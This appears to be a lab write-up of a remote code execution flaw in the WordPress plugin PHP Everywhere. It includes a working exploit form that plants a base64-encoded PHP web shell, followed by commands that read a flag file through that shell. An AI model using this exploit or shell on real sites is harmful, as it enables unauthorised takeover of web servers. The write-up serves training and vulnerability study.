Product Introduction
WordPress is a personal blog system that has gradually evolved into a content management system software. It is developed using PHP language and MySQL database. Users can use their own blogs on servers that support PHP and MySQL databases.
Vulnerability Overview
Any subscriber can exploit this vulnerability by sending a request with the "shortcode" parameter set to PHP Everywhere and execute arbitrary PHP code on the site.
Scope of Impact
<= 2.0.3
Affected Plugin: PHP Everywhere
Exploitation Process
Access the backend address:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin
Account: test/test
Delete the content below the dashboard, press F12 in the browser, add a node, and enter the following content:
<form
action="http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
method="post"
>
<input name="action" value="parse-media-shortcode" />
<textarea name="shortcode">
[php_everywhere] <?php file_put_contents("/var/www/html/111.php", base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbJ2NtZCddKTsgPz4=")); ?>[/php_everywhere]</textarea>
<input type="submit" value="Execute" />
</form>
Then execute it (click execute) and access the following link:
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php
The page returns 200.
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=phpinfo();
http://eci-2ze4gu4iwrlx8zmuc198.cloudeci1.ichunqiu.com/111.php?cmd=system(%27tac%20/f*%27);
Recommended Fixes
- Upgrade the version
References